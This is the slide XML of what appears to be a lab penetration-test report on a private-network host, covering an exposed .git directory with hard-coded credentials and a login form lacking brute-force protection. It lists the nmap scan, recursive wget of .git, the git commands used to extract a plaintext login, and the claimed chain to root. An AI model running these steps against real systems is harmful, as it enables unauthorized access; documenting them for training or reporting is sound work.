              <a:rPr lang="en-US" sz="1800" dirty="0"/>
              <a:t>CWE-798: Use of Hard-coded Credentials</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://cwe.mitre.org/data/definitions/798.html</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>1. Discovery:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Accessed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143/.git/ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t>Downloaded repository: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="1" dirty="0"/>
              <a:t> –r http://192.168.139.143/.git/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>      2. Exploitation:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>Ran git log and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>git show a4d900a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t>to extract credentials</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0"/>
              <a:t> Logged in with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" i="1" dirty="0">
                <a:hlinkClick r:id="rId3">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>lanf@admin.com:321</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Process Analysis:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>      1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Reconnaissance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>Nmap scan identified open ports (22/SSH, 80/HTTP).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>Directory brute-forcing revealed .git exposure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>      2. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>Reconstructed Git history to find hardcoded credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1600" dirty="0"/>
              <a:t>Used credentials to bypass login and escalate privileges.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="294935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17D89-8471-C2E3-882A-C271C2D62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2205D-D8F6-5BF6-CA24-F819F2AB7E37}"/>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218EC7A4-4BEB-F3D7-F7AC-71C307F20AE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="6987209" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0"/>
              <a:t>Steps to Reproduce:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Scan the target:                                                                   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>sS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0"/>
              <a:t> -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0"/>
              <a:t> --version-all -O --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>osscan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0"/>
              <a:t>-guess -A -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>sC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0"/>
              <a:t> -  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>Pn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0"/>
              <a:t> --script vuln -T5 -p 21,22,80 192.168.139.143 -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0" err="1"/>
              <a:t>oA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" i="1" dirty="0"/>
              <a:t> /root/Desktop</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Discover: URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143/.git/HEAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Download repository: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0" err="1"/>
              <a:t>wget</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t> -r http://192.168.139.143/.git/.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Extract credentials: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>git log, git show a4d900a</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Log in to the web app using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>lanf@admin.com:321</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="2400" b="1" dirty="0"/>
              <a:t>Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Plaintext credentials were retrieved without authentication</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Immediate: Unauthorized admin access to the web application.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chained Exploits: Led to SQL injection, RCE, and root compromise </a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD8D2225-3E38-030D-C3AB-2AF00F31F041}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6453420" y="435836"/>
            <a:ext cx="5455769" cy="713288"/>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0E0678CA-47DA-2231-8031-1FE3622A6B8C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7443887" y="1385860"/>
            <a:ext cx="3474826" cy="1085883"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="139700">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D813E09E-A222-73E8-0308-E163D7DFCC83}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7583292" y="2798819"/>
            <a:ext cx="3196023" cy="1056403"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="139700">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2CD8FD2-7275-A520-B41E-44EEDFFB7A80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7763251" y="4091958"/>
            <a:ext cx="2836099" cy="833156"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="139700">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7543DBD1-289C-18B2-86BA-0AC091295407}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7264000" y="5217652"/>
            <a:ext cx="3861200" cy="508976"/>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1038892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F8466-9074-8DA6-7203-63AB7A65F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F32F7-5A81-1507-B91E-63785265FD04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Weak Login Form (No Brute Force Protection)</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C1783024-FFC6-B4BE-29B5-47503A83C998}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Weak Login Form with No Brute Force Protection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The target web application's login form (located at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>lacked protections against brute-force attacks, such as: Account lockout mechanisms, Rate limiting and CAPTCHA or multi-factor authentication (MFA). This allowed to Systematically guess passwords (e.g., using tools like Hydra). Exploit leaked credentials (e.g., </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>lanf@admin.com:321 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Git logs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) without detection.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Affected Machine, URL &amp; Parameter: Machine IP: 192.168.139.143 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://192.168.139.143/ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>(Login page) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0"/>
              <a:t>Parameters:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> email, password (POST request)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0"/>
              <a:t>Medium</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t> ,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> due to its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>moderate impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> on the system's security posture, despite being a common attack vector.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Risk/Impact</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>Credential Stuffing: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>Attackers can reuse leaked passwords (e.g., 321) or brute-force weak credentials.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>Unauthorized Access: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>Successful login grants access to the dashboard (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>dashboard.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>), leading to further exploits (e.g., SQLi, RCE).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>Chained Attacks: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>Weak authentication facilitated the entire attack chain (Git → Credentials → SQLi → RCE → Root)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34102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BD37F7-A8A1-5D0D-3FC5-2C5164D1DB2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="305490"/>
            <a:ext cx="10515600" cy="688423"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Agenda</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0D5C801E-E0C3-AB44-6EA4-81CBD8661CE1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="993913"/>
            <a:ext cx="10515600" cy="5183050"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Abstract</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Deliverables</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Code/Tools</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Recommendations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>Conclusion</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1800" b="1" dirty="0"/>
              <a:t>References</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1765802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7311D-87D9-E6D0-6B59-E38FD5DB7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91C6-A647-433B-FC3D-4913BE336CDF}"/>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64601F78-E69B-E766-4FA3-84CDDDFFA3F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258417" y="805071"/>
            <a:ext cx="11628783" cy="5367129"/>
